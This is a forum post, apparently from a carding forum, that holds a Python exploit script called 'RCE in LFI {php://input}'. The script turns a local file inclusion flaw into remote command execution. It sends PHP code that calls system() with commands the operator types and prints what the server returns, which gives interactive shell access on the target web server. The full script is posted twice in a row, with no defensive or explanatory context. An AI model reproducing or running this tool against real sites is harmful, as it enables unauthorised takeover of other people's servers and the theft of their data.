CardingMafia Admin
03-13-2013, 09:34 PM
#!/usr/bin/python
# Site: http://the-blackhats.blogspot.com
# Coder: MMxM
# Name: RCE in LFI {php://input}
from sys import argv,exit
import urllib2,re
def main():
try:
if len(argv) != 2:
print "\nRCE in LFI {php://input} by MMxM\n"
print "\nHow to use: %s <site>\nExample: %s localhost/?page=php://input\n" % (argv[0],argv[0])
exit(0)
url = argv[1]
if url[0:4] != "http":
url = "http://"+url
cmd = raw_input("$ ")
while (cmd != "exit"):
values = "mmxm<?php system(\"%s 2> /dev/stdout\"); ?>mmxm" % (cmd)
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
body = response.read()
for m in re.findall('mmxm(.*)mmxm', body,re.S):
print m.rstrip('\n')
cmd = raw_input("$ ")
print "\r\n\nVisitem: http://the-blackhats.blogspot.com\n\n"
except (KeyboardInterrupt):
print "\r\n\nVisitem: http://the-blackhats.blogspot.com\n\n"
main()
# Site: http://the-blackhats.blogspot.com
# Coder: MMxM
# Name: RCE in LFI {php://input}
from sys import argv,exit
import urllib2,re
def main():
try:
if len(argv) != 2:
print "\nRCE in LFI {php://input} by MMxM\n"
print "\nHow to use: %s <site>\nExample: %s localhost/?page=php://input\n" % (argv[0],argv[0])
exit(0)
url = argv[1]
if url[0:4] != "http":
url = "http://"+url
cmd = raw_input("$ ")
while (cmd != "exit"):
values = "mmxm<?php system(\"%s 2> /dev/stdout\"); ?>mmxm" % (cmd)
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
body = response.read()
for m in re.findall('mmxm(.*)mmxm', body,re.S):
print m.rstrip('\n')
cmd = raw_input("$ ")
print "\r\n\nVisitem: http://the-blackhats.blogspot.com\n\n"
except (KeyboardInterrupt):
print "\r\n\nVisitem: http://the-blackhats.blogspot.com\n\n"
main()